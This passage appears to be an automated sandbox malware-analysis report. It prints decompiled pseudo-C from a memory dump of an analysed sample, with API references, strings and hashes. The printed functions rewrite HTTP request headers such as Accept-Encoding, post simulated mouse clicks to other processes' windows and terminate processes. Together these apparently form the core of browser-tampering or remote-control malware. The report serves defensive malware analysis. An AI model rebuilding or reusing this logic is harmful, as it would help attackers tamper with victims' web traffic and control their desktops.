						LeaveCriticalSection(0x422adc);
						goto L9;
					}
					_t186 = _t184 * 0x38 +  *0x422af8;
					if( *(_t186 + 0x20) > 0) {
						L29:
						_t113 =  *(_t186 + 0x24);
						_t188 =  *(_t186 + 0x20) - _t113;
						LeaveCriticalSection(0x422adc);
						_t195 = _a4;
						_t114 =  *0x422acc(_a4,  *((intOrPtr*)(_t186 + 0x1c)) + _t113, _t188);
						_v88 = _t114;
						__eflags = _t114 - 0xffffffff;
						if(_t114 != 0xffffffff) {
							EnterCriticalSection(0x422adc);
							_t115 = E0040EEAE(_t195);
							__eflags = _t115 - 0xffffffff;
							if(_t115 != 0xffffffff) {
								_t166 = _v88;
								_t117 = _t115 * 0x38 +  *0x422af8;
								__eflags = _t166 - _t188;
								if(_t166 != _t188) {
									 *((intOrPtr*)(_t117 + 0x24)) =  *((intOrPtr*)(_t117 + 0x24)) + _t166;
									_t92 = _t117 + 0x28;
									 *_t92 =  *(_t117 + 0x28) - 1;
									__eflags =  *_t92;
									_v88 = 1;
								} else {
									_t88 = _t117 + 0x1c; // -4336348
									_v88 =  *(_t117 + 0x28);
									E00411DB1(E00411CFE( *_t88), _t88, 0, 0x10);
								}
							} else {
								_v88 = _v88 | _t115;
								 *0x422ad8(0xffffe890, 8);
							}
							LeaveCriticalSection(0x422adc);
						}
						L36:
						_t111 = _v88;
						L10:
						return _t111;
					}
					if( *(_t186 + 8) > 0) {
						L38:
						LeaveCriticalSection(0x422adc);
						_t197 = _a4;
						_t121 =  *0x422acc(_a4, _a8, _a12);
						_v88 = _t121;
						__eflags = _t121 - 0xffffffff;
						if(_t121 != 0xffffffff) {
							EnterCriticalSection(0x422adc);
							_t122 = E0040EEAE(_t197);
							__eflags = _t122 - 0xffffffff;
							if(_t122 != 0xffffffff) {
								_t172 = _t122 * 0x38 +  *0x422af8;
								_t178 =  *((intOrPtr*)(_t172 + 8));
								__eflags = _v88 - _t178;
								if(_v88 > _t178) {
									E0040EF6C(_t122);
								} else {
									 *((intOrPtr*)(_t172 + 8)) = _t178 - _v88;
								}
							} else {
								_v88 = _v88 | _t122;
								 *0x422ad8(0xffffe890, 8);
							}
							LeaveCriticalSection(0x422adc);
						}
						goto L36;
					}
					_t125 = E0040F3A2( &_v76, _t192, _a8, _a12);
					_v92 = _t125;
					if(_t125 != 0xffffffff) {
						__eflags = _v72;
						if(_v72 == 0) {
							L37:
							E0041BED2( &_v76);
							_t128 = _v80 + _a12;
							__eflags = _t128;
							 *(_t186 + 8) = _t128;
							goto L38;
						}
						_t130 = E0041B5A4( &_v76);
						_v88 = _t130;
						__eflags = _t130 & 0x00000001;
						if((_t130 & 0x00000001) == 0) {
							_v92 = 0;
							_v88 = 0;
							__eflags = _t130 & 0x00000002;
							if(__eflags != 0) {
								_t203 = E00411D51(__eflags, _a8, _a12);
								 *(_t207 + 0x10) = _t203;
								__eflags = _t203;
								if(_t203 != 0) {
									E0041BF3C( *((intOrPtr*)(_t186 + 0x10)),  *((intOrPtr*)(_t186 + 0xc)));
									E00411CFE( *(_t186 + 0x14));
									E00411CFE( *((intOrPtr*)(_t186 + 4)));
									_t149 = E0041215C(_v76, _v80);
									 *(_t186 + 0x14) =  *(_t186 + 0x14) & 0x00000000;
									_t38 = _t186 + 0x18;
									 *_t38 =  *(_t186 + 0x18) & 0x00000000;
									__eflags =  *_t38;
									 *((intOrPtr*)(_t186 + 4)) = _t149;
									 *((intOrPtr*)(_t186 + 0xc)) = _v36;
									 *((intOrPtr*)(_t186 + 0x10)) =  *((intOrPtr*)(_t207 + 0x68));
									 *((intOrPtr*)(_t207 + 0x14)) = E00416C30(E00416C30(E00416CAC(_t203, _a12, "Accept-Encoding", "identity"), _t165, _t203, "TE"), _t165, _t203, "If-Modified-Since");
								} else {
									E0041BF3C( *((intOrPtr*)(_t207 + 0x60)), _v20);
								}
							}
							__eflags = _v84 & 0x00000004;
							if((_v84 & 0x00000004) == 0) {
								L27:
								__eflags = _v92;
								if(_v92 == 0) {
									goto L37;
								}
								E0041BED2( &_v76);
								_t70 = _t186 + 0x24;
								 *_t70 =  *(_t186 + 0x24) & 0x00000000;
								__eflags =  *_t70;
								 *(_t186 + 8) = _v80;
								 *((intOrPtr*)(_t186 + 0x1c)) = _v92;
								 *(_t186 + 0x20) = _v88;
								 *(_t186 + 0x28) = _a12;
								goto L29;
							}
							_t202 = _v92;
							__eflags = _t202;
							if(__eflags != 0) {
								_t136 = _v88;
							} else {
								_t202 = _a8;
								_t136 = _a12;
							}
							_v84 = _t136;
							_v104 = E0040F682(_v84, __eflags, _t202, _v40, _v36,  &_v92);
							E00411CFE( *((intOrPtr*)(_t207 + 0x44)));
							__eflags = _v108;
							if(_v108 != 0) {
								__eflags = _t202 - _a8;
								if(_t202 != _a8) {
									E00411CFE(_t202);
								}
							} else {
								__eflags = _t202 - _a8;
								if(_t202 == _a8) {
									goto L37;
								}
								_v92 = _t202;
								_v88 = _v84;
							}
							goto L27;
						} else {
							E0041BED2( &_v76);
							LeaveCriticalSection(0x422adc);
							_t111 =  *0x422ad8(0xffffe8a3, 0) | 0xffffffff;
							goto L10;
						}
					} else {
						E0040EF6C(_v84);
						E0041BED2( &_v76);
						goto L8;
					}
				}
			}

0x0040fe30
0x0040fe3d
0x0040feb5
0x0040febe
0x00000000
0x0040fe4b
0x0040fe51
0x0040fe57
0x0040fe5f
0x0040fe61
0x0040fe68
0x0040feae
0x0040feaf
0x00000000
0x0040feaf
0x0040fe6d
0x0040fe77
0x00410053
0x00410053
0x0041005f
0x00410061
0x00410069
0x0041006d
0x00410076
0x0041007a
0x0041007d
0x00410080
0x00410086
0x0041008b
0x0041008e
0x004100a5
0x004100ac
0x004100b2
0x004100b4
0x004100d3
0x004100d6
0x004100d6
0x004100d6
0x004100d9
0x004100b6
0x004100b9
0x004100be
0x004100cc
0x004100cc
0x00410090
0x00410090
0x0041009b
0x004100a2
0x004100e2
0x004100e2
0x004100e8
0x004100e8
0x0040fec7
0x0040fecd
0x0040fecd
0x0040fe81
0x00410104
0x0041010b
0x00410110
0x00410117
0x00410120
0x00410124
0x00410127
0x0041012a
0x00410130
0x00410135
0x00410138
0x00410154
0x0041015a
0x0041015d
0x00410161
0x0041016c
0x00410163
0x00410167
0x00410167
0x0041013a
0x0041013a
0x00410145
0x0041014c
0x00410172
0x00410172
0x00000000
0x00410127
0x0040fe92
0x0040fe97
0x0040fe9e
0x0040fed0
0x0040fed4
0x004100f1
0x004100f5
0x004100fe
0x004100fe
0x00410101
0x00000000
0x00410101
0x0040fedf
0x0040fee4
0x0040fee8
0x0040feea
0x0040ff10
0x0040ff14
0x0040ff18
0x0040ff1a
0x0040ff2b
0x0040ff2d
0x0040ff31
0x0040ff33
0x0040ff4a
0x0040ff52
0x0040ff5a
0x0040ff67
0x0040ff6c
0x0040ff70
0x0040ff70
0x0040ff70
0x0040ff79
0x0040ff88
0x0040ff90
0x0040ffb0
0x0040ff35
0x0040ff3d
0x0040ff3d
0x0040ff33
0x0040ffb4
0x0040ffb9
0x00410020
0x00410020
0x00410025
0x00000000
0x00000000
0x0041002f
0x00410038
0x00410038
0x00410038
0x0041003c
0x00410043
0x0041004a
0x00410050
0x00000000
0x00410050
0x0040ffbb
0x0040ffbf
0x0040ffc1
0x0040ffcb
0x0040ffc3
0x0040ffc3
0x0040ffc6
0x0040ffc6
0x0040ffcf
0x0040ffee
0x0040fff2
0x0040fff7
0x0040fffc
0x00410015
0x00410018
0x0041001b
0x0041001b
0x0040fffe
0x0040fffe
0x00410001
0x00000000
0x00000000
0x0041000b
0x0041000f
0x0041000f
0x00000000
0x0040feec
0x0040fef0
0x0040fef6
0x0040ff0b
0x00000000
0x0040ff0b
0x0040fea0
0x0040fea4
0x0040fea9
0x00000000
0x0040fea9
0x0040fe9e

APIs

Part of subcall function 0041CB59: WaitForSingleObject.KERNEL32(00000000,00419A59,19367401,00000001), ref: 0041CB61

EnterCriticalSection.KERNEL32(00422ADC), ref: 0040FE51
LeaveCriticalSection.KERNEL32(00422ADC), ref: 0040FEAF
LeaveCriticalSection.KERNEL32(00422ADC,?), ref: 0040FEF6
LeaveCriticalSection.KERNEL32(00422ADC), ref: 00410061
EnterCriticalSection.KERNEL32(00422ADC), ref: 00410080
LeaveCriticalSection.KERNEL32(00422ADC), ref: 004100E2
LeaveCriticalSection.KERNEL32(00422ADC), ref: 0041010B
EnterCriticalSection.KERNEL32(00422ADC), ref: 0041012A
LeaveCriticalSection.KERNEL32(00422ADC), ref: 00410172

Strings

Accept-Encoding, xrefs: 0040FF80
identity, xrefs: 0040FF74
If-Modified-Since, xrefs: 0040FFA4

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Leave$Enter$ObjectSingleWait
String ID: Accept-Encoding$If-Modified-Since$identity
API String ID: 3286975823-3034467039
Opcode ID: 7a0a699a2deab50dfed9a92214c090df2856fe2a5acf9c719241a78c50535088
Instruction ID: 90a8d76865297b5f9fb884ba2da475921b80b43c4810e8f45525a72c889eb904
Opcode Fuzzy Hash: 7a0a699a2deab50dfed9a92214c090df2856fe2a5acf9c719241a78c50535088
Instruction Fuzzy Hash: A5A1A071504302AFC720DF24DD45A8EBBA0FF48324F104A2EF954A36A1D778E995CBDA

Uniqueness

Uniqueness Score: -1.00%

Function 0040BA86, Relevance: 18.1, APIs: 12, Instructions: 78
filesynchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040BA86(void** __eax, char _a4) {
				void* __esi;
				void* _t15;
				void* _t16;
				long _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				void* _t22;
				struct HDC__* _t23;
				void* _t24;
				void* _t25;
				void** _t41;

				_t41 = __eax;
				_t1 =  &(_t41[7]); // 0x0
				_t15 =  *_t1;
				if(_t15 != 0) {
					DeleteObject(_t15);
				}
				_t2 =  &(_t41[3]); // 0x0
				_t16 =  *_t2;
				if(_t16 != 0) {
					CloseHandle(_t16);
				}
				_t3 =  &(_t41[1]); // 0x0
				_t17 =  *_t3;
				if(_t17 != 0xffffffff) {
					TlsFree(_t17);
				}
				_t4 =  &(_t41[5]); // 0x0
				_t18 =  *_t4;
				if(_t18 != 0) {
					CloseHandle(_t18);
				}
				_t5 =  &(_t41[4]); // 0x0
				_t19 =  *_t5;
				if(_t19 != 0) {
					UnmapViewOfFile(_t19);
				}
				_t20 =  *_t41;
				if(_t20 != 0) {
					_t20 = CloseHandle(_t20);
				}
				if(_a4 != 0) {
					_t7 =  &(_t41[0x56]); // 0x0
					_t21 =  *_t7;
					if(_t21 != 0) {
						_t8 =  &(_t41[0x55]); // 0x0
						SelectObject( *_t8, _t21);
					}
					_t9 =  &(_t41[0x57]); // 0x0
					_t22 =  *_t9;
					if(_t22 != 0) {
						DeleteObject(_t22);
					}
					_t10 =  &(_t41[0x55]); // 0x0
					_t23 =  *_t10;
					if(_t23 != 0) {
						DeleteDC(_t23);
					}
					_t11 =  &(_t41[0x58]); // 0x0
					_t24 =  *_t11;
					if(_t24 != 0) {
						CloseHandle(_t24);
					}
					_t12 =  &(_t41[0x60]); // 0x0
					_t25 =  *_t12;
					if(_t25 != 0 && WaitForSingleObject(_t25, 0) != 0x102) {
						_t13 =  &(_t41[0x62]); // 0x0
						PostThreadMessageW( *_t13, 0x12, 0, 0);
					}
					_t20 = E0041370D( &(_t41[0x5f]));
				}
				return _t20;
			}

0x0040ba8e
0x0040ba90
0x0040ba90
0x0040ba96
0x0040ba99
0x0040ba99
0x0040ba9b
0x0040ba9b
0x0040baa6
0x0040baa9
0x0040baa9
0x0040baab
0x0040baab
0x0040bab1
0x0040bab4
0x0040bab4
0x0040baba
0x0040baba
0x0040babf
0x0040bac2
0x0040bac2
0x0040bac4
0x0040bac4
0x0040bac9
0x0040bacc
0x0040bacc
0x0040bad2
0x0040bad6
0x0040bad9
0x0040bad9
0x0040bae0
0x0040bae2
0x0040bae2
0x0040baea
0x0040baed
0x0040baf3
0x0040baf3
0x0040baf9
0x0040baf9
0x0040bb01
0x0040bb04
0x0040bb04
0x0040bb06
0x0040bb06
0x0040bb0e
0x0040bb11
0x0040bb11
0x0040bb17
0x0040bb17
0x0040bb1f
0x0040bb22
0x0040bb22
0x0040bb24
0x0040bb24
0x0040bb2c
0x0040bb44
0x0040bb4a
0x0040bb4a
0x0040bb56
0x0040bb56
0x0040bb5e

APIs

DeleteObject.GDI32(00000000), ref: 0040BA99
CloseHandle.KERNEL32(00000000,00000000,00422918,00000000,0040BC8D,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040BAA9
TlsFree.KERNEL32(00000000,00000000,00422918,00000000,0040BC8D,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040BAB4
CloseHandle.KERNEL32(00000000,00000000,00422918,00000000,0040BC8D,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040BAC2
UnmapViewOfFile.KERNEL32(00000000,00000000,00422918,00000000,0040BC8D,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040BACC
CloseHandle.KERNEL32(00000000,00000000,00422918,00000000,0040BC8D,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040BAD9
SelectObject.GDI32(00000000,00000000), ref: 0040BAF3
DeleteObject.GDI32(00000000), ref: 0040BB04
DeleteDC.GDI32(00000000), ref: 0040BB11
CloseHandle.KERNEL32(00000000,00000000,00422918,00000000,0040BC8D,00000000,00000000), ref: 0040BB22
WaitForSingleObject.KERNEL32(00000000,00000000,00000000,00422918,00000000,0040BC8D,00000000,00000000), ref: 0040BB31
PostThreadMessageW.USER32 ref: 0040BB4A

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CloseHandleObject$Delete$FileFreeMessagePostSelectSingleThreadUnmapViewWait
String ID:
API String ID: 1699860549-0
Opcode ID: d83dc3b15fcd31eb2ecd5736054aa2e090a8da67c7980f510d32ecdbe90ff0a9
Instruction ID: 715bfd64a48d163af5742ae47fc03ca5dd3acce316aca4abbd0a94a37181df7f
Opcode Fuzzy Hash: d83dc3b15fcd31eb2ecd5736054aa2e090a8da67c7980f510d32ecdbe90ff0a9
Instruction Fuzzy Hash: EE21CB707007019BD620AB799D88F97B3ECAF44741F444929B956F36E0DB78E8408A6C

Uniqueness

Uniqueness Score: -1.00%

Function 00406EBC, Relevance: 16.6, APIs: 11, Instructions: 118
synchronizationthreadwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406EBC(void* __eax, signed int __ecx, void* __edx, RECT* __edi, long _a4, intOrPtr _a8) {
				char _v5;
				long _v12;
				signed char _v16;
				struct tagRECT _v32;
				char _v140;
				void* __ebx;
				void* __esi;
				signed char _t47;
				intOrPtr _t52;
				void* _t85;
				RECT* _t89;

				_t89 = __edi;
				_t86 = __ecx;
				_t85 = __eax;
				_t47 = E0040B7B4(_a4) & 0x0000ffff;
				_v16 = _t47;
				if((_t47 & 0x00000001) != 0) {
					L16:
					return 1;
				}
				if(GetWindowThreadProcessId(_a4,  &_v12) == 0) {
					_v5 = 0;
				} else {
					_t86 =  &_v140;
					E0041635B( &_v140, _t85 + 0x3c, _v12, _t85 + 0x50, 2);
					_v5 = E004154E1( &_v140);
				}
				if(_v5 == 0 || (_v16 & 0x00000010) != 0) {
					L8:
					if(E00406D5A(_t85, _t86) == 0) {
						L14:
						_t52 = _a8;
						if(( *(_t52 + 0x24) & 0x40000000) == 0) {
							IntersectRect( &_v32, _t52 + 4, _t89);
							FillRect( *(_t85 + 0x154),  &_v32, 6);
							DrawEdge( *(_t85 + 0x154),  &_v32, 0xa, 0xf);
						}
						goto L16;
					}
					E00411D3A( *((intOrPtr*)(_t85 + 0x10)) + 0x114, _t89, 0x10);
					ResetEvent( *(_t85 + 0xc));
					if(PostThreadMessageW( *(_t85 + 0x188),  *(_t85 + 8), 0xfffffffc, _a4) == 0) {
						goto L14;
					}
					if(WaitForSingleObject( *(_t85 + 0xc), 0x3e8) != 0) {
						TerminateProcess( *(_t85 + 0x17c), 0);
						E0041370D(_t85 + 0x17c);
						goto L14;
					}
					if( *((char*)( *((intOrPtr*)(_t85 + 0x10)) + 0x124)) != 1) {
						goto L14;
					}
					return _v5;
				} else {
					ResetEvent( *(_t85 + 0xc));
					_t86 = _t89->left & 0x0000ffff;
					if(PostMessageW(_a4,  *(_t85 + 8), (_t89->top & 0x0000ffff) << 0x00000010 | _t89->left & 0x0000ffff, (_t89->bottom & 0x0000ffff) << 0x00000010 | _t89->right & 0x0000ffff) == 0 || WaitForSingleObject( *(_t85 + 0xc), 0x64) != 0) {
						goto L8;
					} else {
						goto L16;
					}
				}
			}

0x00406ebc
0x00406ebc
0x00406eca
0x00406ed1
0x00406ed4
0x00406ed9
0x00407025
0x00000000
0x00407025
0x00406eee
0x00406f1c
0x00406ef0
0x00406f00
0x00406f06
0x00406f17
0x00406f17
0x00406f2a
0x00406f75
0x00406f7c
0x00406fe4
0x00406fe4
0x00406fee
0x00406ff9
0x0040700b
0x0040701f
0x0040701f
0x00000000
0x00406fee
0x00406f8a
0x00406f92
0x00406faa
0x00000000
0x00000000
0x00406fbc
0x00406fd9
0x00406fdf
0x00000000
0x00406fdf
0x00406fc8
0x00000000
0x00000000
0x00000000
0x00406f32
0x00406f35
0x00406f44
0x00406f60
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f60

APIs

Part of subcall function 0040B7B4: GetClassNameW.USER32 ref: 0040B7CF

GetWindowThreadProcessId.USER32(?,?), ref: 00406EE6
ResetEvent.KERNEL32(00000010), ref: 00406F35
PostMessageW.USER32(?,?,?,00000010), ref: 00406F58
WaitForSingleObject.KERNEL32(00000010,00000064), ref: 00406F67
ResetEvent.KERNEL32(?,?,?,00000010), ref: 00406F92
PostThreadMessageW.USER32 ref: 00406FA2
WaitForSingleObject.KERNEL32(?,000003E8,?,00000010), ref: 00406FB4

Part of subcall function 0041635B: StringFromGUID2.OLE32(?,2937498D,00000028,?,?,00000010,00000000,00020016), ref: 00416401

Part of subcall function 004154E1: OpenMutexW.KERNEL32(00100000,00000000,00000000,0041D386,?,19367401,?,00000001,8889347B,00000002,?,?,00000000), ref: 004154EC
Part of subcall function 004154E1: CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 004154F7

TerminateProcess.KERNEL32(?,00000000,?,00000010), ref: 00406FD9

Part of subcall function 0041370D: CloseHandle.KERNEL32(00000000,0001FDA6,0040BB5B,00000000,00422918,00000000,0040BC8D,00000000,00000000), ref: 0041371C
Part of subcall function 0041370D: CloseHandle.KERNEL32(00000000,0001FDA6,0040BB5B,00000000,00422918,00000000,0040BC8D,00000000,00000000), ref: 00413725

IntersectRect.USER32 ref: 00406FF9
FillRect.USER32 ref: 0040700B
DrawEdge.USER32(?,?,0000000A,0000000F), ref: 0040701F

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CloseHandle$EventMessageObjectPostProcessRectResetSingleThreadWait$ClassDrawEdgeFillFromIntersectMutexNameOpenStringTerminateWindow
String ID:
API String ID: 2453266691-0
Opcode ID: 4930d6bd9a8574288e3c7073299025b2ec30995bc4c6f14af17c16d72b1dd6ba
Instruction ID: 210868998667805254481752e6a8419ca32da207a7284421fbc5583cd24233aa
Opcode Fuzzy Hash: 4930d6bd9a8574288e3c7073299025b2ec30995bc4c6f14af17c16d72b1dd6ba
Instruction Fuzzy Hash: 70418F31904205ABEF109F60DD45FEA7BB8AF04304F0480BAFD45EA1A2DB39D965DB64

Uniqueness

Uniqueness Score: -1.00%

Function 0041A117, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 274
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0041A117(void* __eax, signed int _a4, signed int _a8, signed int _a12, signed short _a16) {
				struct HWND__* _v8;
				char _v12;
				struct HWND__* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed char _v32;
				intOrPtr _v68;
				struct tagWINDOWINFO _v92;
				void* __ebx;
				void* __esi;
				intOrPtr _t107;
				struct HWND__* _t108;
				int _t113;
				int _t114;
				signed char _t143;
				struct HWND__* _t144;
				long _t147;
				struct HWND__* _t170;
				long _t171;
				void* _t174;

				_t174 = __eax;
				_t107 =  *((intOrPtr*)(__eax + 0x10));
				_v16 = 0;
				if( *((intOrPtr*)(_t107 + 0x110)) == 0) {
					_t108 =  *((intOrPtr*)(_t107 + 0x108));
					_v16 = _t108;
					if(_t108 != 0) {
						_v32 = E0040BB61(0, __eax, 0) & 0x0000ffff;
					} else {
						_v32 = 0;
					}
				} else {
					if((_a4 & 0x00000001) != 0) {
						E00419C89(_a12, _a8, __eax);
						_a4 = _a4 & 0xfffffffe;
					}
					if((_a4 & 0x00000004) != 0) {
						E00419C1A(0, _t174, 0, 0, 1);
					}
				}
				_t143 = _a4;
				 *( *(_t174 + 0x10) + 0x100) = _a8;
				_t113 =  *(_t174 + 0x10);
				 *(_t113 + 0x104) = _a12;
				if(_t143 == 0) {
					L69:
					return _t113;
				}
				_v20 = _t143;
				_t26 =  &_v20;
				 *_t26 = _v20 & 0x00000002;
				if( *_t26 == 0) {
					if((_t143 & 0x00000004) == 0) {
						goto L14;
					} else {
						_push(0);
						goto L13;
					}
				} else {
					_push(1);
					L13:
					E0040BB61(1, _t174);
					L14:
					_v24 = _t143;
					_t31 =  &_v24;
					 *_t31 = _v24 & 0x00000020;
					if( *_t31 == 0) {
						if((_t143 & 0x00000040) == 0) {
							L19:
							_v28 = _t143;
							_t36 =  &_v28;
							 *_t36 = _v28 & 0x00000008;
							if( *_t36 == 0) {
								if((_t143 & 0x00000010) == 0) {
									L24:
									_t114 =  *(_t174 + 0x10);
									_push( *((intOrPtr*)(_t114 + 0x104)));
									_push( *((intOrPtr*)(_t114 + 0x100)));
									0xc00000 = 0x64;
									_t170 = E0041643E(0xc00000,  &_v12);
									_t113 = _v12 + 0xfffffff6;
									_v8 = _t170;
									if(_t113 <= 7) {
										_t113 = GetWindowLongW(_t170, 0xfffffff0);
										if((_t113 & 0x40000000) != 0 && (_t113 & 0x00c00000) != 0xc00000 && (_t113 & 0x80040000) == 0) {
											_t113 = GetParent(_t170);
											if(_t113 != 0) {
												_v8 = _t113;
												_t170 = _t113;
											}
										}
									}
									if(_t170 == 0) {
										L35:
										_t144 = _v16;
										if(_t144 != 0) {
											_t113 = IsWindow(_t144);
											if(_t113 == 0 || _t170 != 0 && _t144 != _t170 && (_v32 & 0x00000007) == 0) {
												if(_a4 != 0x8001) {
													_t113 = E00419C1A(0, _t174, 0, 0, 1);
												}
											} else {
												_v8 = _t144;
												_v12 = 1;
												_t170 = _t144;
											}
										}
										goto L43;
									} else {
										_t113 = E0040B7B4(_t170);
										if((_t113 & 0x00000040) == 0) {
											goto L35;
										}
										if(_t170 != _v16) {
											_t113 = E00419C1A(_t170, _t174, GetWindowThreadProcessId(_t170, 0), 0, 1);
										}
										_v12 = 1;
										L43:
										if(_t170 == 0) {
											goto L69;
										}
										_v92.cbSize = 0x3c;
										_t113 = GetWindowInfo(_t170,  &_v92);
										if(_t113 == 0) {
											goto L69;
										}
										_t113 = _a8 & 0x0000ffff;
										_t147 = (_a12 & 0x0000ffff) << 0x00000010 | _t113;
										if(_v12 != 1) {
											_t171 = _a4;
										} else {
											_t113 = E0040B7B4(_t170);
											if((_t113 & 0x00000020) == 0) {
												_t113 = _a8 - _v92.rcClient & 0x0000ffff;
												_t171 = (_a12 - _v68 & 0x0000ffff) << 0x00000010 | _t113;
											} else {
												_t171 = _t147;
											}
										}
										if(_v20 == 0) {
											if((_a4 & 0x00000004) == 0) {
												goto L55;
											}
											_push(_t147);
											_push(_t171);
											_push(0xa2);
											_push(0x202);
											goto L54;
										} else {
											_push(_t147);
											_push(_t171);
											_push(0xa1);
											_push(0x201);
											L54:
											_push(_v12);
											_push( &_v92);
											_push(_v8);
											_t113 = E00419E89(_t174, 0xc00000);
											L55:
											if(_v24 == 0) {
												if((_a4 & 0x00000040) == 0) {
													L60:
													if(_v28 == 0) {
														if((_a4 & 0x00000010) == 0) {
															L65:
															if((_a4 & 0x00000001) != 0) {
																_t113 = E00419E89(_t174, 0xc00000, _v8,  &_v92, _v12, 0x200, 0xa0, _t171, _t147);
															}
															if((_a4 & 0x00000800) != 0) {
																_t113 = PostMessageW(_v8, 0x20a, (_a16 & 0x0000ffff) << 0x00000010 | E0040BB61(0, _t174, 0) & 0x0000ffff, _t147);
															}
															goto L69;
														}
														_push(_t147);
														_push(_t171);
														_push(0xa5);
														_push(0x205);
														L64:
														_push(_v12);
														_push( &_v92);
														_push(_v8);
														_t113 = E00419E89(_t174, 0xc00000);
														goto L65;
													}
													_push(_t147);
													_push(_t171);
													_push(0xa4);
													_push(0x204);
													goto L64;
												}
												_push(_t147);
												_push(_t171);
												_push(0xa8);
												_push(0x208);
												L59:
												_push(_v12);
												_push( &_v92);
												_push(_v8);
												_t113 = E00419E89(_t174, 0xc00000);
												goto L60;
											}
											_push(_t147);
											_push(_t171);
											_push(0xa7);
											_push(0x207);
											goto L59;
										}
									}
								}
								_push(0);
								L23:
								E0040BB61(2, _t174);
								goto L24;
							}
							_push(1);
							goto L23;
						}
						_push(0);
						L18:
						E0040BB61(4, _t174);
						goto L19;
					}
					_push(1);
					goto L18;
				}
			}

0x0041a11f
0x0041a121
0x0041a127
0x0041a131
0x0041a15d
0x0041a163
0x0041a168
0x0041a17c
0x0041a16a
0x0041a16a
0x0041a16a
0x0041a133
0x0041a137
0x0041a141
0x0041a146
0x0041a146
0x0041a14e
0x0041a156
0x0041a156
0x0041a14e
0x0041a185
0x0041a188
0x0041a18e
0x0041a194
0x0041a19c
0x0041a420
0x0041a424
0x0041a424
0x0041a1a2
0x0041a1a5
0x0041a1a5
0x0041a1a9
0x0041a1b2
0x00000000
0x0041a1b4
0x0041a1b4
0x00000000
0x0041a1b4
0x0041a1ab
0x0041a1ab
0x0041a1b5
0x0041a1b9
0x0041a1be
0x0041a1be
0x0041a1c1
0x0041a1c1
0x0041a1c5
0x0041a1ce
0x0041a1da
0x0041a1da
0x0041a1dd
0x0041a1dd
0x0041a1e1
0x0041a1ea
0x0041a1f6
0x0041a1f6
0x0041a1f9
0x0041a202
0x0041a20a
0x0041a210
0x0041a215
0x0041a218
0x0041a21e
0x0041a223
0x0041a22e
0x0041a245
0x0041a24d
0x0041a24f
0x0041a252
0x0041a252
0x0041a24d
0x0041a22e
0x0041a256
0x0041a285
0x0041a285
0x0041a28a
0x0041a28d
0x0041a295
0x0041a2ba
0x0041a2c4
0x0041a2c4
0x0041a2a5
0x0041a2a5
0x0041a2a8
0x0041a2af
0x0041a2af
0x0041a295
0x00000000
0x0041a258
0x0041a259
0x0041a260
0x00000000
0x00000000
0x0041a265
0x0041a277
0x0041a277
0x0041a27c
0x0041a2c9
0x0041a2cb
0x00000000
0x00000000
0x0041a2d6
0x0041a2dd
0x0041a2e5
0x00000000
0x00000000
0x0041a2ef
0x0041a2f6
0x0041a2fc
0x0041a325
0x0041a2fe
0x0041a2ff
0x0041a306
0x0041a31e
0x0041a321
0x0041a308
0x0041a308
0x0041a308
0x0041a306
0x0041a32c
0x0041a340
0x00000000
0x00000000
0x0041a342
0x0041a343
0x0041a344
0x0041a349
0x00000000
0x0041a32e
0x0041a32e
0x0041a32f
0x0041a330
0x0041a335
0x0041a34e
0x0041a34e
0x0041a354
0x0041a355
0x0041a35a
0x0041a35f
0x0041a363
0x0041a377
0x0041a396
0x0041a39a
0x0041a3ae
0x0041a3cd
0x0041a3d1
0x0041a3eb
0x0041a3eb
0x0041a3f7
0x0041a41a
0x0041a41a
0x00000000
0x0041a3f7
0x0041a3b0
0x0041a3b1
0x0041a3b2
0x0041a3b7
0x0041a3bc
0x0041a3bc
0x0041a3c2
0x0041a3c3
0x0041a3c8
0x00000000
0x0041a3c8
0x0041a39c
0x0041a39d
0x0041a39e
0x0041a3a3
0x00000000
0x0041a3a3
0x0041a379
0x0041a37a
0x0041a37b
0x0041a380
0x0041a385
0x0041a385
0x0041a38b
0x0041a38c
0x0041a391
0x00000000
0x0041a391
0x0041a365
0x0041a366
0x0041a367
0x0041a36c
0x00000000
0x0041a36c
0x0041a32c
0x0041a256
0x0041a1ec
0x0041a1ed
0x0041a1f1
0x00000000
0x0041a1f1
0x0041a1e3
0x00000000
0x0041a1e3
0x0041a1d0
0x0041a1d1
0x0041a1d5
0x00000000
0x0041a1d5
0x0041a1c7
0x00000000
0x0041a1c7

APIs

GetWindowLongW.USER32(00000000,000000F0), ref: 0041A223
GetParent.USER32(00000000), ref: 0041A245
GetWindowThreadProcessId.USER32(?,00000000), ref: 0041A26A
IsWindow.USER32(?), ref: 0041A28D

Part of subcall function 00419C89: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00419C9D
Part of subcall function 00419C89: ReleaseMutex.KERNEL32(?), ref: 00419CBC
Part of subcall function 00419C89: GetWindowRect.USER32 ref: 00419CC9
Part of subcall function 00419C89: IsRectEmpty.USER32 ref: 00419D4D
Part of subcall function 00419C89: GetWindowLongW.USER32(?,000000F0), ref: 00419D5C
Part of subcall function 00419C89: GetParent.USER32(?), ref: 00419D72
Part of subcall function 00419C89: MapWindowPoints.USER32 ref: 00419D7B
Part of subcall function 00419C89: SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 00419D9F

